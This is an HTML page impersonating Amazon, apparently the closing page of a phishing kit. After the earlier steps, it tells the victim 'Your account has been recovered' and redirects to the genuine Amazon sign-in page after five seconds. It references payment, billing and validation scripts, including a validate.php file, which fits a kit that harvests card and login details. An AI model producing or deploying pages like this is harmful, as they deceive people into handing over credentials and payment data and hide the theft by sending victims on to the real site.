<html><head>
    <title>Amazon - Update Info</title>
    <link rel="icon" href="../assets/img/amazon.png">
    <link rel="stylesheet" href="../assets/css/mobile_login.css">
    <link rel="stylesheet" href="../assets/css/billing.css">
    <script type="text/javascript" src="../assets/js/jquery-1.9.1.js"></script>
    <script type="text/javascript" src="../assets/js/jquery.validate.min.js"></script>
    <script type="text/javascript" src="../assets/js/jquery.payment.js"></script>
    <script type="text/javascript" src="../assets/js/additional-methods.min.js"></script>
    <script type="text/javascript" src="../assets/js/jquery.maskedinput.js"></script>
    <script type="text/javascript" src="../assets/js/validate.php"></script>
    <script type="text/javascript" src="../assets/js/validation.js"></script>
    <meta charset="utf-8">
    <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
    <meta http-equiv="refresh" content="5; url=https://www.amazon.com/ap/signin?openid.pape.max_auth_age=0&amp;openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fyour-account%3Fref_%3Dnav_ya_signin&amp;openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid.assoc_handle=usflex&amp;openid.mode=checkid_setup&amp;openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;"></head>
    <body>
      <center>
     <br><header style="background-color:#fff;">
      <div class="hleft">
      <i class="a-icon a-icon-logo" style="background-position: -5px -130px;
        height: 31px;
        width: 103px;" role="img" aria-label="Amazon"></i>
      </div>
      </header>  </center><center>
      <br><div style="width:400px;" class="boxlogin">
    <div class="a-box a-alert a-alert-success cvf-widget-alert cvf-widget-alert-id-cvf-claim-collect-page-alert"><div class="a-box-inner a-alert-container"><h4 class="a-alert-heading">Success</h4><i class="a-icon a-icon-alert"></i><div class="a-alert-content"><div class="a-section cvf-alert-section cvf-widget-alert-message">Your account has been recovered.</div></div></div></div>
    <br>
    For your security you will automatically be logged out.</div>
    </center>
    <br><br>
    
    </body></html>

    <!-- https://www.amazon.com/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fyour-account%3Fref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=usflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0& -->